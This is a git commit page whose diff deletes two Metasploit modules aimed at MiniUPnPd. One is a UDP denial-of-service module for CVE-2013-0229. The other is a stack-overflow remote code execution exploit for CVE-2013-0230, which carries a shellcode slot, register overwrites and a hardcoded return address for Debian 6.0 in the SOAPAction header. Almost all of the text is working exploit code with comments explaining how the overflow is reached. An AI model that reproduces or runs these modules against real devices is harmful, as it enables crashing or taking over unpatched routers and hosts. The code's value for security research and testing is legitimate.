Deleted the DoS UPnP modules, because they are not relevant to the current branch.
parent
e8752e1400
commit
675fbb3045
|
@ -1,86 +0,0 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MiniUPnPd < 1,4 denial of service (DoS) exploit',
|
||||
'Description' =>
|
||||
%q{
|
||||
This module allows remote attackers to cause a denial of service in MiniUPnP 1.0
|
||||
server via specifically crafted UDP request. This vulnerability was identified
|
||||
as CVE-2013-0229.
|
||||
},
|
||||
'Author' => [ 'Dejan Lukan' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9999 $',
|
||||
'References' => [
|
||||
[ 'CVE', '2013-0229' ],
|
||||
[ 'OSVDB', '89625' ],
|
||||
],
|
||||
'DisclosureData' => 'Mar 27 2013',
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1900),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
# connect to the UDP port
|
||||
connect_udp
|
||||
|
||||
# the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
|
||||
# ST line
|
||||
sploit = "M-SEARCH * HTTP/1.1\r\n"\
|
||||
"HOST: 239.255.255.250:1900\r\n"\
|
||||
"ST:uuid:schemas:device:MX:3"
|
||||
|
||||
# the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
|
||||
# this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
|
||||
# characters: there's more chance that the the program will run off the stack.
|
||||
sploit += ' '*(1500-sploit.length)
|
||||
|
||||
# send the exploit to the target
|
||||
print_status("Sending malformed packet to #{rhost}...")
|
||||
udp_sock.put(sploit)
|
||||
|
||||
# disconnect from the server
|
||||
print_status("The target should be unresponsive now...")
|
||||
disconnect_udp
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -1,156 +0,0 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MiniUPnPd 1.0 stack overflow remote code execution',
|
||||
'Description' =>
|
||||
%q{
|
||||
This module exploits the MiniUPnP 1.0 SOAP stack overflow vulnerability present
|
||||
in the SOAPAction HTTP header. This vulnerability was identified as CVE-2013-0230.
|
||||
},
|
||||
'Author' => [ 'Dejan Lukan' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9999 $',
|
||||
'DefaultOptions' => { 'EXITFUNC' => 'process', },
|
||||
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
|
||||
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
|
||||
# of the program is never reached)
|
||||
'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
|
||||
'Platform' => 'linux',
|
||||
'References' => [
|
||||
[ 'CVE', '2013-0230' ],
|
||||
[ 'OSVDB', '89624' ],
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
#['Debian GNU/Linux 4.0', { 'Ret' => 0x0804c334, 'Offset' => 2123 }],
|
||||
['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => false,
|
||||
'DisclosureData' => 'Mar 27 2013',
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5555),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
packet = "M-SEARCH * HTTP/1.1\r\n \
|
||||
HOST: 239.255.255.250:1900\r\n \
|
||||
ST: ssdp:all\r\n \
|
||||
MX:2\r\n \
|
||||
MAN:\"ssdp:discover\"\r\n"
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
#
|
||||
# Build the SOAP Exploit
|
||||
#
|
||||
# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
|
||||
sploit = "\xeb\x2d"
|
||||
|
||||
# a valid action
|
||||
sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
|
||||
|
||||
# payload
|
||||
sploit += payload.encoded
|
||||
|
||||
# nops
|
||||
#sploit += "\x90"*(target['Offset'] - sploit.length - 16)
|
||||
sploit += rand_text(target['Offset'] - sploit.length - 16)
|
||||
|
||||
# overwrite registers on stack
|
||||
sploit += "\x41\x41\x41\x41" # overwrite EBX
|
||||
sploit += "\x42\x42\x42\x42" # overwrite ESI
|
||||
sploit += "\x43\x43\x43\x43" # overwrite EDI
|
||||
sploit += "\x44\x44\x44\x44" # overwrite EBP
|
||||
|
||||
# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
|
||||
# stack points directly to the string after 'Soapaction: ', which is why we must
|
||||
# throw the first value on the stack away, which we're doing with the pop ebp
|
||||
# instruction. Then we're returning to the next value on the stack, which is
|
||||
# exactly the address that we want.
|
||||
sploit += [target.ret].pack('V')
|
||||
|
||||
# the ending " character is necessary for the vulnerability to be reached
|
||||
sploit += "\""
|
||||
|
||||
# data sent in the POST body
|
||||
data =
|
||||
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
|
||||
"<SOAP-ENV:Envelope\r\n" +
|
||||
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
|
||||
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
|
||||
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
|
||||
">\r\n" +
|
||||
"<SOAP-ENV:Body>\r\n" +
|
||||
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
|
||||
"</ns1:action>\r\n" +
|
||||
"</SOAP-ENV:Body>\r\n" +
|
||||
"</SOAP-ENV:Envelope>\r\n"
|
||||
|
||||
|
||||
#
|
||||
# Build and send the HTTP request
|
||||
#
|
||||
print_status("Sending exploit to victim #{target.name} at ...")
|
||||
send_request_raw({
|
||||
'uri' => target_uri.path,
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'SOAPAction' => sploit,
|
||||
#'User-Agent' => 'Python-urllib/2.7',
|
||||
#'Connection' => 'close',
|
||||
#'Content-Type' => 'application/x-www-form-urlencoded',
|
||||
},
|
||||
'data' => data,
|
||||
}, 25)
|
||||
|
||||
|
||||
# handle the exploit
|
||||
handler
|
||||
|
||||
# disconnect from the server
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue